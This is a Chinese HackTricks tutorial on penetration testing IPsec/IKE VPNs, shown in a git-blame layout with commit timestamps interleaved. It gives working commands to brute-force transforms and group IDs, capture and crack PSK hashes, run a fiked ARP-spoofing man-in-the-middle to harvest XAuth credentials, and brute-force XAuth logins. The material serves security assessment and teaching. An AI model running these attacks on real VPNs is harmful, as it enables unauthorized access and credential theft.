2023-08-30 09:57:28 +00:00
# 500/udp - IPsec/IKE VPN 渗透测试
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
< details >
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks 云 ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
* 你在一家**网络安全公司**工作吗?想要在 HackTricks 上**宣传你的公司**吗?或者你想要**获取最新版本的 PEASS 或下载 PDF 格式的 HackTricks**?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品——[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组** ](https://discord.gg/hRep4RUj7f ) 或 [**Telegram 群组** ](https://t.me/peass ),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库** ](https://github.com/carlospolop/hacktricks-cloud ) **提交 PR 来分享你的黑客技巧。**
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
< / details >
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
< figure > < img src = "../.gitbook/assets/image (674).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
找到最重要的漏洞, 以便更快地修复它们。Intruder 跟踪你的攻击面,运行主动威胁扫描,发现整个技术栈中的问题,从 API 到 Web 应用和云系统。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
***
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
## 基本信息
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
IPsec 是用于网关到网关( LAN 到 LAN) 和主机到网关( 远程访问) 企业 VPN 解决方案的最常用技术。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
**IKE 是 ISAKMP 的一种类型**( Internet Security Association Key Management Protocol) 实现, 它是一种用于身份验证和密钥交换的框架。IKE 通过三个阶段的过程在两个端点之间建立安全关联( SA) :
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
* **第 1 阶段:**使用预共享密钥( PSK) 或证书在 2 个端点之间建立安全通道。它可以使用主模式( 3 对消息)或**主动模式**。
2023-08-03 19:12:22 +00:00
* **第 1.5 阶段:**这是可选的,称为扩展认证阶段,用于对尝试连接的用户进行身份验证(用户+密码)。
2023-08-30 09:57:28 +00:00
* **第 2 阶段:**使用 ESP 和 AH 协商数据安全的参数。它可以使用与第 1 阶段不同的算法( 完全前向保密性( PFS) ) 。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**默认端口:**500/udp
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
## 使用 nmap 发现服务
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
root@bt:~# nmap -sU -p 500 172.16.21.200
Starting Nmap 5.51 (http://nmap.org) at 2011-11-26 10:56 IST
Nmap scan report for 172.16.21.200
Host is up (0.00036s latency).
PORT STATE SERVICE
500/udp open isakmp
MAC Address: 00:1B:D5:54:4D:E4 (Cisco Systems)
```
2023-08-30 09:57:28 +00:00
## **查找有效的转换**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
IPSec配置只能准备接受一个或几个转换。一个转换是一组值的组合。**每个转换**包含一些属性, 如DES或3DES作为**加密算法**, SHA或MD5作为**完整性算法**,预共享密钥作为**身份验证类型**, Diffie-Hellman 1或2作为密钥**分发算法**, 以及28800秒作为**生命周期**。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
因此,你首先要做的是**找到一个有效的转换**,这样服务器才会与你通信。为此,你可以使用工具**ike-scan**。默认情况下, ike-scan在主模式下工作, 并向网关发送一个带有ISAKMP头和一个包含**八个转换**的提议的数据包。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
根据响应,你可以获取有关终端的一些信息:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
root@bt:~# ike-scan -M 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
2023-08-03 19:12:22 +00:00
HDR=(CKY-R=d90bf054d6b76401)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
2020-07-15 15:43:14 +00:00
Ending ike-scan 1.9: 1 hosts scanned in 0.015 seconds (65.58 hosts/sec). 1 returned handshake; 0 returned notify
```
2023-08-30 09:57:28 +00:00
正如您在上一条回复中所看到的,有一个名为**AUTH**的字段,其值为**PSK**。这意味着VPN是使用预共享密钥进行配置的( 对于渗透测试人员来说, 这非常好) 。
2023-08-03 19:12:22 +00:00
**最后一行的值也非常重要:**
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
* _返回0个握手; 返回0个通知: _ 这意味着目标不是一个IPsec网关。
* _**返回1个握手; 返回0个通知: **_ 这意味着目标已配置为IPsec, 并愿意执行IKE协商, 并且您提出的一个或多个变换是可接受的( 输出中将显示一个有效的变换) 。
* _返回0个握手; 返回1个通知: _ 当**没有一个变换是可接受的**时, VPN网关会响应一个通知消息( 尽管一些网关不会这样做, 在这种情况下, 应尝试进一步分析和修改提议) 。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
因此,在这种情况下,我们已经有了一个有效的变换,但如果您处于第三种情况,则需要**稍微进行暴力破解以找到一个有效的变换:**
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
首先,您需要创建所有可能的变换:
2020-07-15 15:43:14 +00:00
```bash
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do for HASH in 1 2 3 4 5 6; do for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do echo "--trans=$ENC,$HASH,$AUTH,$GROUP" >> ike-dict.txt ;done ;done ;done ;done
```
2023-08-03 19:12:22 +00:00
然后使用ike-scan对每个进行暴力破解( 这可能需要几分钟) :
2020-07-15 15:43:14 +00:00
```bash
while read line; do (echo "Valid trans found: $line" & & sudo ike-scan -M $line < IP > ) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt
```
2023-08-03 19:12:22 +00:00
如果暴力破解没有成功,可能服务器即使对有效的转换也没有进行握手响应。那么,你可以尝试使用侵略模式进行相同的暴力破解:
2020-07-15 15:43:14 +00:00
```bash
while read line; do (echo "Valid trans found: $line" & & ike-scan -M --aggressive -P handshake.txt $line < IP > ) | grep -B7 "SA=" | grep "Valid trans found" ; done < ike-dict.txt
```
2023-08-03 19:12:22 +00:00
希望**有效的转换被回显**。\
您可以尝试使用[**iker.py**](https://github.com/isaudits/scripts/blob/master/iker.py)进行**相同的攻击**。\
您还可以尝试使用[**ikeforce**](https://github.com/SpiderLabs/ikeforce)来暴力破解转换:
2020-07-15 15:43:14 +00:00
```bash
2021-11-24 16:49:46 +00:00
./ikeforce.py < IP > # No parameters are required for scan -h for additional help
2020-07-15 15:43:14 +00:00
```
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 109 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
在**DH Group: 14 = 2048-bit MODP**和**15 = 3072-bit**中\
2023-08-30 09:57:28 +00:00
**2 = HMAC-SHA = SHA1( 在这种情况下) 。--trans格式为$Enc, $Hash, $Auth, $DH**
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
思科建议特别避免使用DH组1和2。论文的作者描述了如何通过离散对数预计算来解密使用弱组协商的IPsec会话, 这很可能是国家可以做到的。通过对使用弱组( 1,024位或更小) 的任何会话进行实时解密, 数亿美元的预计算成本得到了摊销。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
### 服务器指纹识别
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
然后, 您可以使用ike-scan尝试**发现设备的供应商**。该工具发送一个初始提议并停止重放。然后,它将**分析**从服务器接收到的消息与匹配的响应模式之间的**时间差异**, 渗透测试人员可以成功识别VPN网关供应商。此外, 一些VPN服务器将使用带有IKE的可选**供应商ID( VID) 负载**。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**如果需要,指定有效的转换**(使用--trans)
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果IKE发现供应商, 它将打印出来:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
root@bt:~# ike-scan -M --showbackoff 172.16.21.200
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
172.16.21.200 Main Mode Handshake returned
2023-08-03 19:12:22 +00:00
HDR=(CKY-R=4f3ec84731e2214a)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
VID=4048b7d56ebce88525e7de7f00d6c2d3c0000000 (IKE Fragmentation)
2020-07-15 15:43:14 +00:00
IKE Backoff Patterns:
2023-08-03 19:12:22 +00:00
2020-07-15 15:43:14 +00:00
IP Address No. Recv time Delta Time
172.16.21.200 1 1322286031.744904 0.000000
172.16.21.200 2 1322286039.745081 8.000177
172.16.21.200 3 1322286047.745989 8.000908
172.16.21.200 4 1322286055.746972 8.000983
172.16.21.200 Implementation guess: Cisco VPN Concentrator
2023-08-03 19:12:22 +00:00
2020-07-15 15:43:14 +00:00
Ending ike-scan 1.9: 1 hosts scanned in 84.080 seconds (0.01 hosts/sec). 1 returned handshake; 0 returned notify
```
2023-08-03 19:12:22 +00:00
这也可以使用nmap脚本_**ike-version**_来实现。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
## 查找正确的ID( 组名)
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
为了能够捕获哈希值, 您需要一个支持主动模式和正确ID( 组名) 的有效转换。您可能不知道有效的组名, 因此您需要进行暴力破解。\
为此, 我建议您使用2种方法:
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
### 使用ike-scan进行ID暴力破解
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
首先, 尝试使用虚假的ID发出请求, 尝试收集哈希值( "-P") :
2020-07-15 15:43:14 +00:00
```bash
ike-scan -P -M -A -n fakeID < IP >
```
2023-08-30 09:57:28 +00:00
如果**没有返回哈希值**,那么可能这种暴力破解的方法会起作用。**如果返回了某个哈希值, 这意味着将返回一个伪造的哈希值用于伪造的ID, 因此这种方法不可靠**来暴力破解ID。例如, 可能会返回一个伪造的哈希值( 在现代版本中会发生这种情况) :
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 110 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
但是, 如果如我所说, 没有返回哈希值, 那么你应该尝试使用ike-scan来暴力破解常见的组名。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
这个脚本**将尝试暴力破解可能的ID**, 并返回返回有效握手的ID( 这将是一个有效的组名) 。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
如果你发现了特定的转换, 请在ike-scan命令中添加它。如果你发现了多个转换, 请随意添加一个新的循环来尝试它们( 你应该尝试它们所有, 直到其中一个正常工作为止) 。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
你可以使用[ikeforce的字典](https://github.com/SpiderLabs/ikeforce/blob/master/wordlists/groupnames.dic)或[seclists中的字典](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/ike-groupid.txt)来暴力破解常见的组名:
2020-07-15 15:43:14 +00:00
```bash
2021-01-18 14:24:10 +00:00
while read line; do (echo "Found ID: $line" & & sudo ike-scan -M -A -n $line < IP > ) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
2020-07-15 15:43:14 +00:00
```
2023-08-30 09:57:28 +00:00
或者使用这个字典(是两个字典的组合,没有重复的内容):
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
{% file src="../.gitbook/assets/vpnIDs.txt" %}
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
### 使用Iker进行ID暴力破解
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
[**iker.py** ](https://github.com/isaudits/scripts/blob/master/iker.py ) 也使用 **ike-scan** 来暴力破解可能的组名。它遵循自己的方法, 根据ike-scan的输出来找到一个有效的ID。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
### 使用ikeforce进行ID暴力破解
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
[**ikeforce.py** ](https://github.com/SpiderLabs/ikeforce ) 是一个可以用来暴力破解ID的工具。该工具将尝试利用不同的漏洞来区分有效ID和非有效ID( 可能会有误报和误判, 这就是为什么我更喜欢使用ike-scan方法) 。
2021-10-18 11:21:18 +00:00
2023-08-30 09:57:28 +00:00
默认情况下, ikeforce会在开始时发送一些随机的ID来检查服务器的行为, 并确定要使用的策略。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
* 第一种方法是通过搜索Cisco系统的Dead Peer Detection DPD信息( 只有在组名正确时服务器才会回复该信息) 来暴力破解组名。
* 第二种可用的方法是检查每次尝试发送的响应数量, 因为有时在使用正确的ID时会发送更多的数据包。
* 第三种方法是在对不正确的ID进行响应时搜索"INVALID-ID-INFORMATION"。
* 最后, 如果服务器对检查没有任何回复, ikeforce将尝试暴力破解服务器, 并检查当发送正确的ID时服务器是否会回复一些数据包。\
显然, 暴力破解ID的目标是在获得有效的ID后获取PSK。然后, 使用ID和PSK将需要暴力破解XAUTH( 如果启用) 。
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
如果您发现了特定的转换, 请将其添加到ikeforce命令中。如果您发现了多个转换, 请随意添加一个新的循环来尝试它们( 您应该尝试它们所有, 直到其中一个正常工作为止) 。
2020-07-15 15:43:14 +00:00
```bash
git clone https://github.com/SpiderLabs/ikeforce.git
pip install 'pyopenssl==17.2.0' #It is old and need this version of the library
```
```bash
./ikeforce.py < IP > -e -w ./wordlists/groupnames.dic
```
2023-08-30 09:57:28 +00:00
### 嗅探ID
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
通过嗅探VPN客户端和服务器之间的连接, 也可以获取有效的用户名, 因为第一个激进模式数据包中包含的客户端ID是明文发送的( 来自书籍《网络安全评估: 了解您的网络》) 。
2020-07-15 15:43:14 +00:00
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 111 ) . png > )
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
## 捕获和破解哈希值
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
最后,如果您找到了一个**有效的转换**和**组名**,并且**允许激进模式**,那么您可以非常容易地获取可破解的哈希值:
2020-07-15 15:43:14 +00:00
```bash
ike-scan -M -A -n < ID > --pskcrack=hash.txt < IP > #If aggressive mode is supported and you know the id, you can get the hash of the passwor
```
2023-08-30 09:57:28 +00:00
哈希值将保存在 _hash.txt_ 文件中。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
您可以使用 **psk-crack** 、**john**(使用 [**ikescan2john.py** ](https://github.com/truongkma/ctf-tools/blob/master/John/run/ikescan2john.py ))和 **hashcat** 来 **破解**该哈希值:
2021-01-18 14:26:55 +00:00
```bash
2022-01-12 14:33:12 +00:00
psk-crack -d < Wordlist_path > psk.txt
2020-07-15 15:43:14 +00:00
```
2023-08-30 09:57:28 +00:00
## **XAuth**
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
大多数实现使用**侵略模式的IKE与PSK进行组认证**,并使用**XAUTH提供额外的用户认证**( 通过Microsoft Active Directory、RADIUS或类似方式) 。在**IKEv2**中,**EAP替代XAUTH**用于认证用户。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
### 本地网络中间人攻击以捕获凭据
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
因此, 您可以使用_fiked_捕获登录数据, 并查看是否存在默认用户名( 您需要将IKE流量重定向到`fiked`以进行嗅探, 可以借助ARP欺骗来完成, [更多信息](https://opensourceforu.com/2012/01/ipsec-vpn-penetration-testing-backtrack-tools/)) 。Fiked将充当VPN终端点, 并捕获XAuth凭据:
2021-01-18 14:26:55 +00:00
```bash
2020-07-15 15:43:14 +00:00
fiked -g < IP > -k testgroup:secretkey -l output.txt -d
```
2023-08-03 19:12:22 +00:00
此外, 使用IPSec尝试进行中间人攻击, 并阻止所有流量到端口500, 如果无法建立IPSec隧道, 可能会以明文形式发送流量。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
### 使用ikeforce暴力破解XAUTH用户名和密码
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
要暴力破解**XAUTH**(当您知道有效的组名**id**和**psk**时),您可以使用用户名或用户名列表以及密码列表:
2021-01-18 14:26:55 +00:00
```bash
2020-07-15 15:43:14 +00:00
./ikeforce.py < IP > -b -i < group_id > -u < username > -k < PSK > -w < passwords.txt > [-s 1]
```
2023-08-03 19:12:22 +00:00
这样, ikeforce将尝试使用每个用户名:密码组合进行连接。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
如果找到一个或多个有效的转换方式,就像之前的步骤一样使用它们。
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
## 使用IPSEC VPN进行身份验证
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
在Kali中, 使用**VPNC**建立IPsec隧道。**配置文件**必须位于_**/etc/vpnc/**_中, 您可以使用工具_**vpnc**_来调用它们。\
2023-08-03 19:12:22 +00:00
以下示例摘自书籍**Network Security Assessment 3rd Edition**:
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
root@kali:~# cat > /etc/vpnc/vpntest.conf < < STOP
IPSec gateway 10.0.0.250
IPSec ID vpntest
IPSec secret groupsecret123
IKE Authmode psk
Xauth username chris
Xauth password tiffers1
STOP
root@kali:~# vpnc vpntest
VPNC started in background (pid: 6980)...
root@kali:~# ifconfig tun0
```
2023-08-30 09:57:28 +00:00
## 参考资料
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
* [PSK破解论文 ](http://www.ernw.de/download/pskattack.pdf )
2020-07-15 15:43:14 +00:00
* [SecurityFocus Infocus ](http://www.securityfocus.com/infocus/1821 )
2023-08-30 09:57:28 +00:00
* [扫描VPN实现 ](http://www.radarhack.com/dir/papers/Scanning\_ike\_with\_ikescan.pdf )
2020-07-15 15:43:14 +00:00
2023-08-30 09:57:28 +00:00
## Shodan
2020-10-05 13:59:40 +00:00
* `port:500 IKE`
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
< figure > < img src = "broken-reference" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
找到最重要的漏洞, 以便更快地修复它们。Intruder跟踪您的攻击面, 运行主动威胁扫描, 发现整个技术堆栈中的问题, 从API到Web应用程序和云系统。[**立即免费试用**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)。
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks& utm_source=referral" %}
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
< details >
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks云 ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2022-04-28 16:01:33 +00:00
2023-08-30 09:57:28 +00:00
* 您在**网络安全公司**工作吗? 您想在HackTricks中看到您的**公司广告**吗?或者您想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 发现我们的独家[NFT收藏品**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组** ](https://discord.gg/hRep4RUj7f )或[**电报群组**](https://t.me/peass),或在**Twitter**上**关注**我[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **提交PR来分享您的黑客技巧。**
2022-04-28 16:01:33 +00:00
< / details >